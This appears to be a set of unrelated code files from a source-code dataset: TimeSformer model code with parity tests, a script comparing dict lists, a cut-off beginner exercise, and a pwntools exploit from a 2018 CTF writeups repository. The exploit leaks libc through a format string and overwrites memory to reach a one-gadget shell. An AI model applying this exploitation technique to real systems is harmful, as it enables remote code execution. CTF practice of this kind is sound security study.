self.head = head_helper.X3DHead(dim_in=dim_out, dim_inner=dim_inner, dim_out=cfg.X3D.DIM_C5, num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[cfg.DATA.NUM_FRAMES, spat_sz, spat_sz], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT, bn_lin5_on=cfg.X3D.BN_LIN5)
def forward(self, x, bboxes=None):
for module in self.children():
x = module(x)
return x
class Mlp(nn.Module):
def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.0):
super().__init__()
out_features = out_features or in_features
hidden_features = hidden_features or in_features
self.fc1 = nn.Linear(in_features, hidden_features)
self.act = act_layer()
self.fc2 = nn.Linear(hidden_features, out_features)
self.drop = nn.Dropout(drop)
def forward(self, x):
x = self.fc1(x)
x = self.act(x)
x = self.drop(x)
x = self.fc2(x)
x = self.drop(x)
return x
class Attention(nn.Module):
def __init__(self, dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0.0, proj_drop=0.0, with_qkv=True):
super().__init__()
self.num_heads = num_heads
head_dim = dim // num_heads
self.scale = qk_scale or head_dim ** -0.5
self.with_qkv = with_qkv
if self.with_qkv:
self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)
self.proj = nn.Linear(dim, dim)
self.proj_drop = nn.Dropout(proj_drop)
self.attn_drop = nn.Dropout(attn_drop)
def forward(self, x):
B, N, C = x.shape
if self.with_qkv:
qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)
q, k, v = qkv[0], qkv[1], qkv[2]
else:
qkv = x.reshape(B, N, self.num_heads, C // self.num_heads).permute(0, 2, 1, 3)
q, k, v = qkv, qkv, qkv
attn = q @ k.transpose(-2, -1) * self.scale
attn = attn.softmax(dim=-1)
attn = self.attn_drop(attn)
x = (attn @ v).transpose(1, 2).reshape(B, N, C)
if self.with_qkv:
x = self.proj(x)
x = self.proj_drop(x)
return x
def drop_path(x, drop_prob: float=0.0, training: bool=False):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
This is the same as the DropConnect impl I created for EfficientNet, etc networks, however,
the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...
See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for
changing the layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use
'survival rate' as the argument.
"""
if drop_prob == 0.0 or not training:
return x
keep_prob = 1 - drop_prob
shape = (x.shape[0],) + (1,) * (x.ndim - 1)
random_tensor = keep_prob + torch.rand(shape, dtype=x.dtype, device=x.device)
random_tensor.floor_()
output = x.div(keep_prob) * random_tensor
return output
class DropPath(nn.Module):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
"""
def __init__(self, drop_prob=None):
super(DropPath, self).__init__()
self.drop_prob = drop_prob
def forward(self, x):
return drop_path(x, self.drop_prob, self.training)
class Block(nn.Module):
def __init__(self, dim, num_heads, mlp_ratio=4.0, qkv_bias=False, qk_scale=None, drop=0.0, attn_drop=0.0, drop_path=0.1, act_layer=nn.GELU, norm_layer=nn.LayerNorm, attention_type='divided_space_time'):
super().__init__()
self.attention_type = attention_type
assert attention_type in ['divided_space_time', 'space_only', 'joint_space_time']
self.norm1 = norm_layer(dim)
self.attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop)
if self.attention_type == 'divided_space_time':
self.temporal_norm1 = norm_layer(dim)
self.temporal_attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop)
self.temporal_fc = nn.Linear(dim, dim)
self.drop_path = DropPath(drop_path) if drop_path > 0.0 else nn.Identity()
self.norm2 = norm_layer(dim)
mlp_hidden_dim = int(dim * mlp_ratio)
self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)
def forward(self, x, B, T, W):
num_spatial_tokens = (x.size(1) - 1) // T
H = num_spatial_tokens // W
if self.attention_type in ['space_only', 'joint_space_time']:
x = x + self.drop_path(self.attn(self.norm1(x)))
x = x + self.drop_path(self.mlp(self.norm2(x)))
return x
elif self.attention_type == 'divided_space_time':
xt = x[:, 1:, :]
xt = rearrange(xt, 'b (h w t) m -> (b h w) t m', b=B, h=H, w=W, t=T)
res_temporal = self.drop_path(self.temporal_attn(self.temporal_norm1(xt)))
res_temporal = rearrange(res_temporal, '(b h w) t m -> b (h w t) m', b=B, h=H, w=W, t=T)
res_temporal = self.temporal_fc(res_temporal)
xt = x[:, 1:, :] + res_temporal
init_cls_token = x[:, 0, :].unsqueeze(1)
cls_token = init_cls_token.repeat(1, T, 1)
cls_token = rearrange(cls_token, 'b t m -> (b t) m', b=B, t=T).unsqueeze(1)
xs = xt
xs = rearrange(xs, 'b (h w t) m -> (b t) (h w) m', b=B, h=H, w=W, t=T)
xs = torch.cat((cls_token, xs), 1)
res_spatial = self.drop_path(self.attn(self.norm1(xs)))
cls_token = res_spatial[:, 0, :]
cls_token = rearrange(cls_token, '(b t) m -> b t m', b=B, t=T)
cls_token = torch.mean(cls_token, 1, True)
res_spatial = res_spatial[:, 1:, :]
res_spatial = rearrange(res_spatial, '(b t) (h w) m -> b (h w t) m', b=B, h=H, w=W, t=T)
res = res_spatial
x = xt
x = torch.cat((init_cls_token, x), 1) + torch.cat((cls_token, res), 1)
x = x + self.drop_path(self.mlp(self.norm2(x)))
return x
def _ntuple(n):
def parse(x):
if isinstance(x, container_abcs.Iterable):
return x
return tuple(repeat(x, n))
return parse
to_2tuple = _ntuple(2)
class PatchEmbed(nn.Module):
""" Image to Patch Embedding
"""
def __init__(self, img_size=224, patch_size=16, in_chans=3, embed_dim=768):
super().__init__()
img_size = to_2tuple(img_size)
patch_size = to_2tuple(patch_size)
num_patches = img_size[1] // patch_size[1] * (img_size[0] // patch_size[0])
self.img_size = img_size
self.patch_size = patch_size
self.num_patches = num_patches
self.proj = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=patch_size)
def forward(self, x):
B, C, T, H, W = x.shape
x = rearrange(x, 'b c t h w -> (b t) c h w')
x = self.proj(x)
W = x.size(-1)
x = x.flatten(2).transpose(1, 2)
return x, T, W
def _no_grad_trunc_normal_(tensor, mean, std, a, b):
def norm_cdf(x):
return (1.0 + math.erf(x / math.sqrt(2.0))) / 2.0
if mean < a - 2 * std or mean > b + 2 * std:
warnings.warn('mean is more than 2 std from [a, b] in nn.init.trunc_normal_. The distribution of values may be incorrect.', stacklevel=2)
with torch.no_grad():
l = norm_cdf((a - mean) / std)
u = norm_cdf((b - mean) / std)
tensor.uniform_(2 * l - 1, 2 * u - 1)
tensor.erfinv_()
tensor.mul_(std * math.sqrt(2.0))
tensor.add_(mean)
tensor.clamp_(min=a, max=b)
return tensor
def trunc_normal_(tensor, mean=0.0, std=1.0, a=-2.0, b=2.0):
"""Fills the input Tensor with values drawn from a truncated
normal distribution. The values are effectively drawn from the
normal distribution :math:`\\mathcal{N}(\\text{mean}, \\text{std}^2)`
with values outside :math:`[a, b]` redrawn until they are within
the bounds. The method used for generating the random values works
best when :math:`a \\leq \\text{mean} \\leq b`.
Args:
tensor: an n-dimensional `torch.Tensor`
mean: the mean of the normal distribution
std: the standard deviation of the normal distribution
a: the minimum cutoff value
b: the maximum cutoff value
Examples:
>>> w = torch.empty(3, 5)
>>> nn.init.trunc_normal_(w)
"""
return _no_grad_trunc_normal_(tensor, mean, std, a, b)
class VisionTransformer(nn.Module):
""" Vision Transformere
"""
def __init__(self, img_size=224, patch_size=16, in_chans=3, num_classes=1000, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4.0, qkv_bias=False, qk_scale=None, drop_rate=0.0, attn_drop_rate=0.0, drop_path_rate=0.1, hybrid_backbone=None, norm_layer=nn.LayerNorm, num_frames=8, attention_type='divided_space_time', dropout=0.0):
super().__init__()
self.attention_type = attention_type
self.depth = depth
self.dropout = nn.Dropout(dropout)
self.num_classes = num_classes
self.num_features = self.embed_dim = embed_dim
self.patch_embed = PatchEmbed(img_size=img_size, patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim)
num_patches = self.patch_embed.num_patches
self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))
self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, embed_dim))
self.pos_drop = nn.Dropout(p=drop_rate)
if self.attention_type != 'space_only':
self.time_embed = nn.Parameter(torch.zeros(1, num_frames, embed_dim))
self.time_drop = nn.Dropout(p=drop_rate)
dpr = [x.item() for x in torch.linspace(0, drop_path_rate, self.depth)]
self.blocks = nn.ModuleList([Block(dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale, drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer, attention_type=self.attention_type) for i in range(self.depth)])
self.norm = norm_layer(embed_dim)
self.head = nn.Linear(embed_dim, num_classes) if num_classes > 0 else nn.Identity()
trunc_normal_(self.pos_embed, std=0.02)
trunc_normal_(self.cls_token, std=0.02)
self.apply(self._init_weights)
if self.attention_type == 'divided_space_time':
i = 0
for m in self.blocks.modules():
m_str = str(m)
if 'Block' in m_str:
if i > 0:
nn.init.constant_(m.temporal_fc.weight, 0)
nn.init.constant_(m.temporal_fc.bias, 0)
i += 1
def _init_weights(self, m):
if isinstance(m, nn.Linear):
trunc_normal_(m.weight, std=0.02)
if isinstance(m, nn.Linear) and m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.LayerNorm):
nn.init.constant_(m.bias, 0)
nn.init.constant_(m.weight, 1.0)
@torch.jit.ignore
def no_weight_decay(self):
return {'pos_embed', 'cls_token', 'time_embed'}
def get_classifier(self):
return self.head
def reset_classifier(self, num_classes, global_pool=''):
self.num_classes = num_classes
self.head = nn.Linear(self.embed_dim, num_classes) if num_classes > 0 else nn.Identity()
def forward_features(self, x):
B = x.shape[0]
x, T, W = self.patch_embed(x)
cls_tokens = self.cls_token.expand(x.size(0), -1, -1)
x = torch.cat((cls_tokens, x), dim=1)
if x.size(1) != self.pos_embed.size(1):
pos_embed = self.pos_embed
cls_pos_embed = pos_embed[0, 0, :].unsqueeze(0).unsqueeze(1)
other_pos_embed = pos_embed[0, 1:, :].unsqueeze(0).transpose(1, 2)
P = int(other_pos_embed.size(2) ** 0.5)
H = x.size(1) // W
other_pos_embed = other_pos_embed.reshape(1, x.size(2), P, P)
new_pos_embed = F.interpolate(other_pos_embed, size=(H, W), mode='nearest')
new_pos_embed = new_pos_embed.flatten(2)
new_pos_embed = new_pos_embed.transpose(1, 2)
new_pos_embed = torch.cat((cls_pos_embed, new_pos_embed), 1)
x = x + new_pos_embed
else:
x = x + self.pos_embed
x = self.pos_drop(x)
if self.attention_type != 'space_only':
cls_tokens = x[:B, 0, :].unsqueeze(1)
x = x[:, 1:]
x = rearrange(x, '(b t) n m -> (b n) t m', b=B, t=T)
if T != self.time_embed.size(1):
time_embed = self.time_embed.transpose(1, 2)
new_time_embed = F.interpolate(time_embed, size=T, mode='nearest')
new_time_embed = new_time_embed.transpose(1, 2)
x = x + new_time_embed
else:
x = x + self.time_embed
x = self.time_drop(x)
x = rearrange(x, '(b n) t m -> b (n t) m', b=B, t=T)
x = torch.cat((cls_tokens, x), dim=1)
for blk in self.blocks:
x = blk(x, B, T, W)
if self.attention_type == 'space_only':
x = rearrange(x, '(b t) n m -> b t n m', b=B, t=T)
x = torch.mean(x, 1)
x = self.norm(x)
return x[:, 0]
def forward(self, x):
x = self.forward_features(x)
x = self.head(x)
return x
def _conv_filter(state_dict, patch_size=16):
""" convert patch embedding weight from manual patchify + linear proj to conv"""
out_dict = {}
for k, v in state_dict.items():
if 'patch_embed.proj.weight' in k:
if v.shape[-1] != patch_size:
patch_size = v.shape[-1]
v = v.reshape((v.shape[0], 3, patch_size, patch_size))
out_dict[k] = v
return out_dict
IMAGENET_DEFAULT_MEAN = 0.485, 0.456, 0.406
IMAGENET_DEFAULT_STD = 0.229, 0.224, 0.225
def _cfg(url='', **kwargs):
return {'url': url, 'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': None, 'crop_pct': 0.9, 'interpolation': 'bicubic', 'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD, 'first_conv': 'patch_embed.proj', 'classifier': 'head', **kwargs}
default_cfgs = {'vit_base_patch16_224': _cfg(url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-vitjx/jx_vit_base_p16_224-80ecf9dd.pth', mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))}
_logger = logging.getLogger(__name__)
def load_state_dict(checkpoint_path, use_ema=False):
if checkpoint_path and os.path.isfile(checkpoint_path):
checkpoint = torch.load(checkpoint_path, map_location='cpu')
state_dict_key = 'state_dict'
if isinstance(checkpoint, dict):
if use_ema and 'state_dict_ema' in checkpoint:
state_dict_key = 'state_dict_ema'
if state_dict_key and state_dict_key in checkpoint:
new_state_dict = OrderedDict()
for k, v in checkpoint[state_dict_key].items():
name = k[7:] if k.startswith('module') else k
new_state_dict[name] = v
state_dict = new_state_dict
elif 'model_state' in checkpoint:
state_dict_key = 'model_state'
new_state_dict = OrderedDict()
for k, v in checkpoint[state_dict_key].items():
name = k[6:] if k.startswith('model') else k
new_state_dict[name] = v
state_dict = new_state_dict
else:
state_dict = checkpoint
_logger.info("Loaded {} from checkpoint '{}'".format(state_dict_key, checkpoint_path))
return state_dict
else:
_logger.error("No checkpoint found at '{}'".format(checkpoint_path))
raise FileNotFoundError()
def load_pretrained(model, cfg=None, num_classes=1000, in_chans=3, filter_fn=None, img_size=224, num_frames=8, num_patches=196, attention_type='divided_space_time', pretrained_model='', strict=True):
if cfg is None:
cfg = getattr(model, 'default_cfg')
if cfg is None or 'url' not in cfg or not cfg['url']:
_logger.warning('Pretrained model URL is invalid, using random initialization.')
return
if len(pretrained_model) == 0:
state_dict = model_zoo.load_url(cfg['url'], progress=False, map_location='cpu')
else:
try:
state_dict = load_state_dict(pretrained_model)['model']
except:
state_dict = load_state_dict(pretrained_model)
if filter_fn is not None:
state_dict = filter_fn(state_dict)
if in_chans == 1:
conv1_name = cfg['first_conv']
_logger.info('Converting first conv (%s) pretrained weights from 3 to 1 channel' % conv1_name)
conv1_weight = state_dict[conv1_name + '.weight']
conv1_type = conv1_weight.dtype
conv1_weight = conv1_weight.float()
O, I, J, K = conv1_weight.shape
if I > 3:
assert conv1_weight.shape[1] % 3 == 0
conv1_weight = conv1_weight.reshape(O, I // 3, 3, J, K)
conv1_weight = conv1_weight.sum(dim=2, keepdim=False)
else:
conv1_weight = conv1_weight.sum(dim=1, keepdim=True)
conv1_weight = conv1_weight
state_dict[conv1_name + '.weight'] = conv1_weight
elif in_chans != 3:
conv1_name = cfg['first_conv']
conv1_weight = state_dict[conv1_name + '.weight']
conv1_type = conv1_weight.dtype
conv1_weight = conv1_weight.float()
O, I, J, K = conv1_weight.shape
if I != 3:
_logger.warning('Deleting first conv (%s) from pretrained weights.' % conv1_name)
del state_dict[conv1_name + '.weight']
strict = False
else:
_logger.info('Repeating first conv (%s) weights in channel dim.' % conv1_name)
repeat = int(math.ceil(in_chans / 3))
conv1_weight = conv1_weight.repeat(1, repeat, 1, 1)[:, :in_chans, :, :]
conv1_weight *= 3 / float(in_chans)
conv1_weight = conv1_weight
state_dict[conv1_name + '.weight'] = conv1_weight
classifier_name = cfg['classifier']
if num_classes == 1000 and cfg['num_classes'] == 1001:
classifier_weight = state_dict[classifier_name + '.weight']
state_dict[classifier_name + '.weight'] = classifier_weight[1:]
classifier_bias = state_dict[classifier_name + '.bias']
state_dict[classifier_name + '.bias'] = classifier_bias[1:]
elif num_classes != state_dict[classifier_name + '.weight'].size(0):
del state_dict[classifier_name + '.weight']
del state_dict[classifier_name + '.bias']
strict = False
if num_patches + 1 != state_dict['pos_embed'].size(1):
pos_embed = state_dict['pos_embed']
cls_pos_embed = pos_embed[0, 0, :].unsqueeze(0).unsqueeze(1)
other_pos_embed = pos_embed[0, 1:, :].unsqueeze(0).transpose(1, 2)
new_pos_embed = F.interpolate(other_pos_embed, size=num_patches, mode='nearest')
new_pos_embed = new_pos_embed.transpose(1, 2)
new_pos_embed = torch.cat((cls_pos_embed, new_pos_embed), 1)
state_dict['pos_embed'] = new_pos_embed
if 'time_embed' in state_dict and num_frames != state_dict['time_embed'].size(1):
time_embed = state_dict['time_embed'].transpose(1, 2)
new_time_embed = F.interpolate(time_embed, size=num_frames, mode='nearest')
state_dict['time_embed'] = new_time_embed.transpose(1, 2)
if attention_type == 'divided_space_time':
new_state_dict = state_dict.copy()
for key in state_dict:
if 'blocks' in key and 'attn' in key:
new_key = key.replace('attn', 'temporal_attn')
if not new_key in state_dict:
new_state_dict[new_key] = state_dict[key]
else:
new_state_dict[new_key] = state_dict[new_key]
if 'blocks' in key and 'norm1' in key:
new_key = key.replace('norm1', 'temporal_norm1')
if not new_key in state_dict:
new_state_dict[new_key] = state_dict[key]
else:
new_state_dict[new_key] = state_dict[new_key]
state_dict = new_state_dict
model.load_state_dict(state_dict, strict=False)
class vit_base_patch16_224(nn.Module):
def __init__(self, cfg, **kwargs):
super(vit_base_patch16_224, self).__init__()
self.pretrained = True
patch_size = 16
self.model = VisionTransformer(img_size=cfg.DATA.TRAIN_CROP_SIZE, num_classes=cfg.MODEL.NUM_CLASSES, patch_size=patch_size, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4, qkv_bias=True, norm_layer=partial(nn.LayerNorm, eps=1e-06), drop_rate=0.0, attn_drop_rate=0.0, drop_path_rate=0.1, num_frames=cfg.DATA.NUM_FRAMES, attention_type=cfg.TIMESFORMER.ATTENTION_TYPE, **kwargs)
self.attention_type = cfg.TIMESFORMER.ATTENTION_TYPE
self.model.default_cfg = default_cfgs['vit_base_patch16_224']
self.num_patches = cfg.DATA.TRAIN_CROP_SIZE // patch_size * (cfg.DATA.TRAIN_CROP_SIZE // patch_size)
pretrained_model = cfg.TIMESFORMER.PRETRAINED_MODEL
if self.pretrained:
load_pretrained(self.model, num_classes=self.model.num_classes, in_chans=kwargs.get('in_chans', 3), filter_fn=_conv_filter, img_size=cfg.DATA.TRAIN_CROP_SIZE, num_patches=self.num_patches, attention_type=self.attention_type, pretrained_model=pretrained_model)
def forward(self, x):
x = self.model(x)
return x
class TimeSformer(nn.Module):
def __init__(self, img_size=224, patch_size=16, num_classes=400, num_frames=8, attention_type='divided_space_time', pretrained_model='', **kwargs):
super(TimeSformer, self).__init__()
self.pretrained = True
self.model = VisionTransformer(img_size=img_size, num_classes=num_classes, patch_size=patch_size, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4, qkv_bias=True, norm_layer=partial(nn.LayerNorm, eps=1e-06), drop_rate=0.0, attn_drop_rate=0.0, drop_path_rate=0.1, num_frames=num_frames, attention_type=attention_type, **kwargs)
self.attention_type = attention_type
self.model.default_cfg = default_cfgs['vit_base_patch' + str(patch_size) + '_224']
self.num_patches = img_size // patch_size * (img_size // patch_size)
if self.pretrained:
load_pretrained(self.model, num_classes=self.model.num_classes, in_chans=kwargs.get('in_chans', 3), filter_fn=_conv_filter, img_size=img_size, num_frames=num_frames, num_patches=self.num_patches, attention_type=self.attention_type, pretrained_model=pretrained_model)
def forward(self, x):
x = self.model(x)
return x
import torch
from torch.nn import MSELoss, ReLU
from _paritybench_helpers import _mock_config, _mock_layer, _paritybench_base, _fails_compile
TESTCASES = [
# (nn.Module, init_args, forward_args, jit_compiles)
(BasicTransform,
lambda: ([], {'dim_in': 4, 'dim_out': 4, 'temp_kernel_size': 4, 'stride': 1}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
True),
(BottleneckTransform,
lambda: ([], {'dim_in': 4, 'dim_out': 4, 'temp_kernel_size': 4, 'stride': 1, 'dim_inner': 4, 'num_groups': 1}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
True),
(Conv2dSame,
lambda: ([], {'in_channels': 4, 'out_channels': 4, 'kernel_size': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
False),
(DropPath,
lambda: ([], {}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
False),
(Linear,
lambda: ([], {'in_features': 4, 'out_features': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(Mlp,
lambda: ([], {'in_features': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(Nonlocal,
lambda: ([], {'dim': 4, 'dim_inner': 4}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
False),
(ResNetBasicStem,
lambda: ([], {'dim_in': 4, 'dim_out': 4, 'kernel': 4, 'stride': 1, 'padding': 4}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
True),
(SE,
lambda: ([], {'dim_in': 4, 'ratio': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(Swish,
lambda: ([], {}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
False),
(X3DTransform,
lambda: ([], {'dim_in': 4, 'dim_out': 4, 'temp_kernel_size': 4, 'stride': 1, 'dim_inner': 4, 'num_groups': 1}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
False),
]
class Test_facebookresearch_TimeSformer(_paritybench_base):
def test_000(self):
self._check(*TESTCASES[0])
def test_001(self):
self._check(*TESTCASES[1])
def test_002(self):
self._check(*TESTCASES[2])
def test_003(self):
self._check(*TESTCASES[3])
def test_004(self):
self._check(*TESTCASES[4])
def test_005(self):
self._check(*TESTCASES[5])
def test_006(self):
self._check(*TESTCASES[6])
def test_007(self):
self._check(*TESTCASES[7])
def test_008(self):
self._check(*TESTCASES[8])
def test_009(self):
self._check(*TESTCASES[9])
def test_010(self):
self._check(*TESTCASES[10])
|
[
"[email protected]"
] | |
ce4cb92d76d50fbd63accaff41bd8af8bbd952e1
|
0f9b6a33a5e2ce627db75d1bcc34bc3f3674335b
|
/sctf/2018/catchthebug/exploit.py
|
10ff19c7084f606481adcd2e34de7136bf30a20a
|
[] |
no_license
|
hnoson/writeups
|
359a33b03286bab19359ad9b089e6f3bfe4fb708
|
05550e3c462108f6c5ba0b69f65694e2eb1dc9b3
|
refs/heads/master
| 2021-10-07T18:21:26.041101 | 2021-10-03T10:22:31 | 2021-10-03T10:22:31 | 119,823,623 | 7 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,927 |
py
|
#!/usr/bin/env python
from pwn import *
def catch(name):
while True:
s.sendlineafter('>> ', '1')
s.recvline()
if s.recvline(False) == 'There is no bug =(':
continue
s.sendafter('>> ', name)
break
def inspect(num):
s.sendlineafter('>> ', '2')
ret = []
for i in range(num):
s.recvuntil('==\n')
ret.append((s.recvline(False), len(s.recvuntil('=')) - 2))
return ret
def submit(title = 'A' * 0x40, subtitle = 'A' * 0x80, body = 'A' * 0x100, tag = 'A' * 8, password = 'A' * 8):
s.sendlineafter('>> ', '3')
s.sendafter('title\n', title)
s.sendafter('subtitle\n', subtitle)
if len(body) < 0x100:
body += '\n'
s.sendafter('body\n', body)
if len(tag) < 8:
tag += '\n'
s.sendafter('tag\n', tag)
s.sendafter('password\n', password)
if __name__ == '__main__':
# context.log_level = 'DEBUG'
if len(sys.argv) == 1:
s = process('./bug_3e99623da36874fd424a4e237866e301d292aa66')
# s = process('./bug_3e99623da36874fd424a4e237866e301d292aa66', env = {'LD_PRELOAD': './libc-2.26.so_cc8df6278e095fcc4ca8a98e1f1c69c04db30a4c'})
else:
s = remote('catchthebug.eatpwnnosleep.com', 55555)
libc = ELF('./libc-2.26.so_cc8df6278e095fcc4ca8a98e1f1c69c04db30a4c')
one_gadgets = [0x47c46, 0x47c9a, 0xfccde, 0xfdb8e]
catch('%p\n')
catch('AAAA')
catch('AAAA')
res = inspect(3)
libc_base = int(res[0][0], 16) - libc.symbols['_IO_2_1_stdout_'] - 131
log.info('libc base: %#x' % libc_base)
length = 8 * 3 + sum([l for _, l in res]) + 0x40 + 0x80
log.info('report length: %#x' % length)
if length < 0x618:
print 'try again'
exit(0)
body = 'A' * (0x708 - length)
body += p64(libc_base + 0x608040 + 3840 - len(body) - 0x9)
tag = p64(libc_base + one_gadgets[2])
submit(body = body, tag = tag)
s.interactive()
|
[
"[email protected]"
] | |
1dccae090daff9f46736e852a5612870a5d07f5c
|
c08e6d8860ad978d89c4735069f45c97c1967a70
|
/compare_obj/compare_obj.py
|
ccebc82ba33156d6e8d56fd74e535c910be8e3ff
|
[] |
no_license
|
leayl/project_exercises
|
bad5158a7fd851d9ddf05c1f4a758acac1953e5b
|
ce97c5bc36e2a49e39407ea6dbf599421510dc5f
|
refs/heads/master
| 2021-01-26T02:42:33.835830 | 2020-04-28T18:15:03 | 2020-04-28T18:15:03 | 243,278,015 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,335 |
py
|
import random
class MyClass():
def __init__(self):
self.dict = {}
def create_2_cls_obj_list(list1, list2):
obj_list1 = []
obj_list2 = []
for dict1 in list1:
obj = MyClass()
obj.dict = dict1
obj_list1.append(obj)
for dict2 in list2:
obj = MyClass()
obj.dict = dict2
obj_list2.append(obj)
return obj_list1, obj_list2
def compare_obj(list1, list2):
obj_list1, obj_list2 = create_2_cls_obj_list(list1, list2)
all_compare_list = create_all_compare_list(obj_list1, obj_list2)
all_compare_list = sorted(all_compare_list, key=lambda group: group[2], reverse=True)
all_list_len = len(all_compare_list)
align_list1 = []
align_list2 = []
for i in range(all_list_len):
group = all_compare_list[i]
obj1 = group[0]
obj2 = group[1]
degree = group[2]
if degree > 0 and obj1 not in align_list1 and obj2 not in align_list2:
align_list1.append(obj1)
align_list2.append(obj2)
obj_list1.remove(obj1)
obj_list2.remove(obj2)
# 剩下list1中未匹配到的
for obj1 in obj_list1:
align_list1.append(obj1)
align_list2.append(None)
# 剩下list2中未匹配到的
for obj2 in obj_list2:
align_list1.append(None)
align_list2.append(obj2)
return align_list1, align_list2
def create_all_compare_list(obj_list1, obj_list2):
all_compare_list = []
for obj1 in obj_list1:
for obj2 in obj_list2:
compare_group = compare_objects_degree(obj1, obj2)
all_compare_list.append(compare_group)
return all_compare_list
def compare_objects_degree(obj1, obj2):
obj1_keys = obj1.dict.keys()
obj2_keys = obj2.dict.keys()
same_keys = set(obj1_keys) & set(obj2_keys)
same_name_count = len(same_keys)
same_value_count = 0
for key in same_keys:
if obj1.dict[key] == obj2.dict[key]:
same_value_count += 1
if same_name_count == same_value_count != 0:
return [obj1, obj2, 1000]
return [obj1, obj2, same_value_count]
def out_single_file(fb, obj):
# 输出丢失或新增的对象
for key, value in obj.dict.items():
fb.write(f" |--{key}={value}\n")
fb.write("\n\n")
def out_diff_file(fb, obj1, obj2):
# 输出未丢失或新增的的对象对比
keys1 = list(obj1.dict.keys())
keys2 = list(obj2.dict.keys())
for key in keys2:
if key not in keys1:
keys1.append(key)
keys = keys1
for key in keys:
if key in obj1.dict.keys() and key in obj2.dict.keys():
fb.write(f" |--{key}={obj1.dict[key]}".ljust(40, ' ') + f" |--{key}={obj2.dict[key]}\n")
elif key in obj1.dict.keys():
fb.write(f" |--{key}={obj1.dict[key]}".ljust(40, ' ') + " |-- =\n")
else:
fb.write(" |-- = ".ljust(40, ' ') + f" |--{key}={obj2.dict[key]}\n")
fb.write("\n\n")
def out_all_files(list1, list2):
lost_obj_file = "result/丢失的对象.txt"
add_obj_file = "result/新增的对象.txt"
diff_obj_file = "result/对象对比.txt"
obj_list1, obj_list2 = compare_obj(list1, list2)
len_objs = len(obj_list1)
with open(lost_obj_file, 'w') as lost_file:
with open(add_obj_file, 'w') as add_file:
with open(diff_obj_file, 'w') as diff_file:
for i in range(len_objs):
obj1 = obj_list1[i]
obj2 = obj_list2[i]
if obj1 is None:
out_single_file(add_file, obj2)
if obj2 is None:
out_single_file(lost_file, obj1)
if obj1 and obj2:
out_diff_file(diff_file, obj1, obj2)
if __name__ == '__main__':
dict_list1 = [
{
"id": 1,
"name": "name1",
"age": 11,
"gender": "woman",
"color": "blue",
},
{
"id": 2,
"name": "name2",
"age": 5,
"gender": "woman",
"color": "pink",
},
{
"id": 3,
"name": "name3",
"age": 55,
"gender": "man",
"color": "black",
},
{
"id": 4,
"name": "name4",
"age": 2,
"gender": "man",
"color": "orange",
},
]
dict_list2 = [
{
"id": 1,
"name": "name111",
"age": 16,
"gender": "woman",
"color": "blue:pink:ooo",
},
{
"id": 6,
"name": "name6",
"age": 6,
"gender": "",
"color": "pnk",
},
{
"id": 3,
"name": "name3",
"age": 20,
"gender": "man",
"color": "black",
"area": "America",
},
{
"id": 4,
"name": "name4",
# "gender": "man",
"color": "",
},
{
"id": 20,
"name": "name20",
"gender": "man",
"color": "green",
"music": "sunset......",
},
]
out_all_files(dict_list1, dict_list2)
|
[
"[email protected]"
] | |
af7ca80306f6f187b11809bd23a256bb4f539dbe
|
e2ad7b63641e06e15df15eb76b1f806fe2ea11c0
|
/basics/programming/ex10.py
|
1572ec2c61c100c8164f46a7661e139b1a620e50
|
[
"Apache-2.0"
] |
permissive
|
LarsTD/answers
|
9b9e04cd3bf7e49a098d39584049523ddc9a1441
|
63b1fcdc1d31182407b072e064ba45d0366aff14
|
refs/heads/master
| 2020-04-09T18:40:12.940835 | 2018-12-12T11:21:48 | 2018-12-12T11:21:48 | 160,519,894 | 0 | 0 |
Apache-2.0
| 2018-12-05T13:09:04 | 2018-12-05T13:09:04 | null |
UTF-8
|
Python
| false | false | 431 |
py
|
print('Pick an operation')
operation = ''
while not operation:
print('enter an valid operator')
answer=input()
if answer == '+':
operation = '+'
elif answer == '-':
